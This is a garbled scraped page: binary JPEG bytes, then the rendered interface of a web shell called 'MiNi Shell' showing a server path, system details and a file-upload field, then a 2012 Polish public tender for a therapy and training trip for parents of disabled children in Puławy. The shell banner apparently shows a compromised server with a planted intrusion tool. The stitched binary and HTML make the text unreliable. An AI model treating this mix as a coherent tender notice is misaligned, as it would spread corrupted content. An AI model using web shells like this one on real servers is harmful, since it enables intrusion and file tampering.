JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120719/157489-N-2012.html

<p class="kh_header"><b>Puławy: Organizacja programu aktywności lokalnej dla rodziców dzieci niepełnosprawnych</b><br>
<b>Numer ogłoszenia: 157489 - 2012; data zamieszczenia: 19.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , al. Królewska 3, 24-100 Puławy, woj. lubelskie, tel. 81888 04 92, faks 81888 04 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.efs-pcpr.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja programu aktywności lokalnej dla rodziców dzieci niepełnosprawnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie:
1.Treningu kompetencji i umiejętności wychowawczych 
2.Kursu pomocy przedmedycznej.
3.Terapii psychospołecznej indywidualnej
4.Terapii rodzinnej (26 rodzin po 3 godziny terapii dla każdej z rodzin)
5.Treningu kompetencji i umiejętności społecznych  szkolenie z zakresu savoir vivre 
dla 27 uczestników projektu  osoby dorosłe w wieku 26 do 52. lata oraz 27 dzieci niepełnosprawnych od 3 do 18 roku życia, oraz 22 współmałżonków w wieku 29 do 54 lata, a także 3 osoby w wieku 6,7 i 23 lata z otoczenia uczestnika ( rodzeństwo dzieci niepełnosprawnych) Łącznie 79 osób.
2. Termin realizacji zamówienia: 
Ustala wykonawca w okresie pomiędzy 06.08.2012 r. a 31.08.2012. r.,  wyjazd ma trwać 9 dni
3. Miejsce realizacji:
Zamawiający zastrzega, aby miejscem realizacji zamówienia była jedna z niżej wymienionych lokalizacji:
 miejscowość nadmorska położona pomiędzy miastem Świnoujście a miastem Krynica Morska z uwzględnieniem terenu tych miast i z wykluczeniem miasta Jastrzębia Góra, przy czym odległość ośrodka tj. miejsca zakwaterowania uczestników do morza nie może przekroczyć 1000 m. 
 miejscowość na terenie Pojezierza Mazurskiego na obszarze jednej z niżej wymienionych gmin: 
        Giżycko, Ryn, Kruklanki, Miłki, Wydminy  w powiecie giżyckim,
        Budry, Węgorzewo  w powiecie węgorzewskim,
       Ełk, Stare Juchy  w powiecie ełckim,
        Orzysz, Pisz, Ruciane Nida   w powiecie pilskim,
        Mikołajki, Mrągowo, Piecki w powiecie mrągowskim,
z zastrzeżeniem, że odległość ośrodka miejsca zakwaterowania uczestników od jeziora nie może przekraczać 1 km.
 miejscowość  znajdująca się: 
na terenie całego powiatu tatrzańskiego
w powiecie nowosądeckim na terenie gminy: Krynica Zdrój, Muszyna, Piwniczna  Zdrój
w powiecie nowotarskim, na terenie gminy: Rabka Zdrój, Szczawnica, Czorsztyn, Czarny Dunajec, Krościenko nad Dunajcem, Ochotnica Dolna
w powiecie limanowskim, na terenie gminy: Limanowa i Mszana Dolna
w powiecie leskim gmina Solina

UWAGA: Ośrodek winien być dostosowany do potrzeb osób niepełnosprawnych poruszających się na wózkach inwalidzkich.

4. Wymagalny minimalny zakres tematyczny:
Trening kompetencji i umiejętności wychowawczych 
 radzenie sobie z własnymi uczuciami w kontekście wychowania dziecka niepełnosprawnego oraz sposoby pomagania dziecku w radzeniu sobie z trudnymi emocjami,
 wzmacnianie mocnych stron dziecka,
 opieka nad dzieckiem niepełnosprawnym
Kurs pomocy przedmedycznej.
Program kursu pierwszej pomocy powinien obejmować omawianie postępowania m.in.: przy padaczce, utracie przytomności, zadławieniu, ranach różnego rodzaju, nagłym zatrzymaniu krążenia lub oparzeniach, czyli takich schorzeniach i urazach, na jakie możemy się natknąć w życiu codziennym, ze szczególnym uwzględnieniem osób niepełnosprawnych. 
Ponadto uczestnicy powinni nabyć wiedzę, jak zabezpieczyć miejsce wypadku, a także wprowadzić podstawowe elementy ratownictwa drogowego. Ww. program ma pozwolić kursantom, po zakończonym szkoleniu, poradzić sobie w większości sytuacji, w których zdrowie lub życie są zagrożone.
Terapia psychospołeczna indywidualna
Zajęcia z terapii integracji sensorycznej  ćwiczenia indywidualnie dobrane do rozwoju i potrzeb dziecka niepełnosprawnego, w oparciu o diagnozę dziecka niepełnosprawnego. 
Terapia rodzinna
 konstruktywne rozwiązywanie konfliktów w rodzinie 
 doskonalenie komunikacji w rodzinie; komunikacja werbalna i niewerbalna
 konsultacje dostosowane do indywidualnych (zgłaszanych) oczekiwań każdej rodziny
Trening kompetencji i umiejętności społecznych  szkolenie z zakresu savoir vivre
 etykieta  rola w życiu zawodowym i społecznym, znaczenie znajomości zasad dobrego wychowania, kultura osobista, uprzejmość, punktualność 
 powitanie i przedstawienie się, jak się przedstawić, uścisk dłoni, układ przedstawiania innych osób
 autoprezentacja w różnych sytuacjach  zasady doboru stroju, najczęstsze uchybienia
 korespondencja okolicznościowa
 zasady prowadzenia rozmów
5. Sposób prowadzenia zajęć oraz czas trwania:
Trening kompetencji i umiejętności wychowawczych 
Zajęcia mają być realizowane w formie grupowej dla 27 uczestników projektu.
Czas trwania zajęć to łącznie 12 godzin, przy czym 1 godzina treningu to 45 minut.
Kurs pomocy przedmedycznej.
Zajęcia mają być realizowane w formie grupowej dla 20 uczestników projektu; czas trwania zajęć to łącznie 6 godzin, przy czym 1 godzina szkolenia zajęć to 45 minut.
Terapia psychospołeczna 
Zajęcia mają być realizowane w formie indywidualnej dla 27 niepełnosprawnych dzieci; czas trwania zajęć to łącznie 27 godzin, (po 1 godzinie dla każdego dziecka w trakcie wyjazdu) przy czym 1 godzina terapii zajęć to 45 minut).
Terapia rodzinna
Zajęcia mają być realizowane w formie indywidualnej dla 26 rodzin wychowujących niepełnosprawne dzieci; czas trwania zajęć to łącznie 78 godzin, (po 3 godziny dla każdej z rodzin) przy czym 1 godzina terapii to 45 minut.
Trening kompetencji i umiejętności społecznych  szkolenie z zakresu savoir vivre 
Zajęcia mają być realizowane w formie grupowej dla 27 uczestników projektu; czas trwania zajęć to łącznie 6 godzin, przy czym 1 godzina treningu to 45 minut.

6. Wymagane minimalne kwalifikacje kadry, która będzie prowadziła zajęcia:
Trening kompetencji i umiejętności wychowawczych 
Osoba prowadząca zajęcia ma posiadać co najmniej wykształcenie wyższe psychologiczne 
i posługiwać się biegle językiem polskim w mowie i w piśmie. 
Kurs pomocy przedmedycznej.
Osoba prowadząca zajęcia ma posiadać co najmniej wykształcenie wyższe na kierunku medycyna lub co najmniej wykształcenie policealne na kierunku ratownik medyczny 
i posługiwać się biegle językiem polskim w mowie i w piśmie. 
Terapia psychospołeczna
Osoba prowadząca zajęcia ma posiadać co najmniej wykształcenie wyższe psychologiczne mająca co najmniej 2 letnie doświadczenie w pracy z dziećmi niepełnosprawnymi oraz mająca  co najmniej 2  letnie doświadczenie w prowadzeniu terapii sensorycznej i posługiwać się biegle językiem polskim w mowie i w piśmie. 
 Terapia rodzinna
Osoba prowadząca zajęcia ma posiadać co najmniej wykształcenie wyższe psychologiczne 
i posługiwać się biegle językiem polskim w mowie i w piśmie. 
Trening kompetencji i umiejętności społecznych  szkolenie z zakresu savoir vivre 
Osoba prowadząca zajęcia ma posiadać co najmniej wykształcenie wyższe na kierunku pedagogika

7. Inne wymagania: 
1). Wykonawca nie może pobierać od uczestników wyjazdu żadnych dodatkowych opłat.
2). Wykonawca ma zapewnić dla wszystkich osób oraz wliczyć w koszt zamówienia także:
a) transport dwoma autokarami uczestników wyjazdu z Puław do miejsca zakwaterowania oraz ich przywóz do Puław, pojazd ze sprawną klimatyzacją i WC;
b) suchy prowiant na czas powrotu do Puław dla wszystkich osób biorących udział w wyjeździe; tj. 2 kanapki, 1 baton, 0,5 l wody mineralnej 
c) pełne wyżywienie (3 posiłki dziennie, tj. śniadanie, obiad: zupa, drugie danie, deser; kolacja) dla wszystkich uczestników wyjazdu;
d) bazę noclegową: 
  zakwaterowanie uczestników w ośrodku dostępnym dla osób na wózkach inwalidzkich, z salą szkoleniową, w jednym budynku lub w kilku położonych obok siebie;
 zakwaterowanie uczestników w pokojach: 3 osobowych i 4 osobowych , 25 pokoi 3 osobowych, 1 pokój 4 osobowy, w tym co najmniej 8 pokoi przystosowanych dla dzieci poruszających się na dziecięcym wózku inwalidzkim
 wszystkie pokoje z pełnym węzłem sanitarnym (łazienkami i toaletami) przystosowanymi dla osób niepełnosprawnych;
e) opiekę nad 27 dziećmi z otoczenia uczestników projektu na czas zajęć uczestników projektu, tj. dwóch opiekunów posiadających wykształcenie co najmniej wyższe oraz uprawnienia opiekuna kolonijnego, posługujących się biegle językiem polskim w mowie i w piśmie; do obowiązków opiekunów należeć będzie zapewnienie dzieciom opieki oraz zorganizowanie zajęć grupowych o charakterze rekreacyjnym;
f) opłatę klimatyczną, miejscową i inną związaną z pobytem za cały okres pobytu, jeśli jest wymagana dla wszystkich osób;
g) materiały biurowe dla każdego 27 uczestników projektu, tj. po 1 notatniku A5, po 1 długopisie, które po zakończeniu szkolenia stają się własnością uczestników.Wszystkie materiały szkoleniowe i biurowe wydawane uczestnikom winny być oznaczone logotypem PCPR w Puławach, UE, EFS i PO KL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacji Projekt systemowy Samodzielni  nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego (logo PCPR w Puławach) i na stronie internetowej www.wup.lublin.pl (pozostałe logotypy). 
h)serwis kawowy dla wszystkich uczestników podczas trwania zajęć
	(tj. kawa, herbata, cukier, śmietanka do kawy, woda mineralna, ciastka)
i) serwis dla 27 dzieci w trakcie sprawowania nad nimi opieki tj. ciastka, napoje;
j) ubezpieczenie od następstw nieszczęśliwych wypadków na czas całego pobytu, łącznie z podróżą (tj. od wyjazdu z Puław do powrotu do Puław),
k) 1 kierownika wyjazdu, posługującego się biegle językiem polskim w mowie i w piśmie, do zadań którego należeć ma m.in. nadzór nad prawidłową realizacją Harmonogramu wyjazdu, nadzór nad zaopatrzeniem uczestników w apteczkę pierwszej pomocy, zapoznanie uczestników z zasadami bezpieczeństwa oraz zapewnienie warunków do ich przestrzegania, nadzór nad sporządzaniem i prowadzeniem dokumentacji,
l) sale szkoleniowe wyposażone w sprzęt niezbędny do przeprowadzenia danych zajęć, w szczególności w stoły, krzesła, tablicę, ekran projekcyjny,
ł) dostęp wszystkich uczestników wyjazdu do bazy rekreacyjnej, w tym infrastruktury sportowej, dostęp do sali świetlicy wyposażonej w TV, obsługę kulturalno oświatową, programy integracji społecznej, tj. zorganizowanie co najmniej jednego ogniska z pieczeniem kiełbasek i co najmniej jednej wycieczki turystycznej po okolicy, a także zapewnienie organizacji czasu wolnego między zajęciami,
m) dostęp do opieki medycznej, tzn. zapewnienie przez wykonawcę dowozu uczestnika do przychodni zdrowia  w przypadku wystąpienia potrzeby udzielenia pomocy lekarskiej lub pielęgniarskiej;
n) Uczestnicy otrzymają zaświadczenia: o udziale w treningu kompetencji i umiejętności społecznych, kursie pomocy przedmedycznej, treningu umiejętności społecznych, terapii rodzinnej, terapii psychospołecznej, które mają być oznaczone logotypem PCPR w Puławach, UE, EFS i POKL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją Projekt systemowy Samodzielni nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego (logo PCPR w Puławach) i na stronie internetowej www.wup.lublin.pl (pozostałe logotypy)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy, dotyczące:
a)posiadania uprawnień do wykonywania działalności lub czynności będącej przedmiotem niniejszego postępowania, jeżeli przepisy prawa nakładają obowiązek ich posiadania;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się spełnieniem tego warunku, jeżeli należycie wykonał, w ostatnich 3 latach przed upływem składania ofert lub jeżeli okres prowadzenia działalności jest krótszy w tym okresie  co najmniej dwa szkolenia minimum     6 - dniowe w formie wyjazdu dla niepełnosprawnych z zapewnieniem uczestnikom zakwaterowania i wyżywienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się spełnieniem tego warunku, jeżeli dysponuje kadrą, która biegle posługuje się językiem polskim w mowie i piśmie oraz :
 posiada co najmniej wykształcenie wyższe psychologiczne (osoba do prowadzenia treningu kompetencji i umiejętności wychowawczych) 
posiada co najmniej wykształcenie wyższe na kierunku medycyna lub co najmniej wykształcenie policealne na kierunku ratownik medyczny (osoba do prowadzenia kursu pomocy przedmedycznej)
 posiada co najmniej wykształcenie wyższe psychologiczne oraz co najmniej 2 letnie doświadczenie w pracy z dziećmi niepełnosprawnymi i  co najmniej 2  letnie doświadczenie w prowadzeniu terapii sensorycznej (osoba do prowadzenia terapii psychospołecznej) 
 posiada co najmniej wykształcenie wyższe psychologiczne (osoba do prowadzenia terapii rodzinnej)
 posiada co najmniej wykształcenie wyższe na kierunku pedagogika (osoba do prowadzenia treningu kompetencji i umiejętności społecznych  szkolenie z zakresu savoir vivre)
 posiada wykształcenie co najmniej wyższe oraz uprawnienia opiekuna kolonijnego (2 osoby do opieki nad dziećmi na czas zajęć uczestników)
 będzie kierownikiem wyjazdu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmiany istotnych postanowień zawartej umowy w stosunku do treści Oferty Wykonawcy, polegające na:
a)zmianie terminu zakończenia zamówienia spowodowanej warunkami atmosferycznymi  w przypadku klęski żywiołowej lub gdy warunki atmosferyczne uniemożliwiają wykonanie zamówienia w terminie wynikającym z oferty,
b)zmianie miejsca przeprowadzenia usługi, z zastrzeżeniem, że proponowane miejsce spełnia warunki określone w postępowaniu przetargowym
c)zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia którego strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwią Wykonawcy wykonanie w części lub w całości jego zobowiązań,
d)zmianie warunków płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych Instytucji Wdrażającej dotyczących realizacji projektu,
e)zmianie osób upoważnionych do współpracy w sprawach związanych z wykonaniem umowy, o których mowa w § 8 umowy,
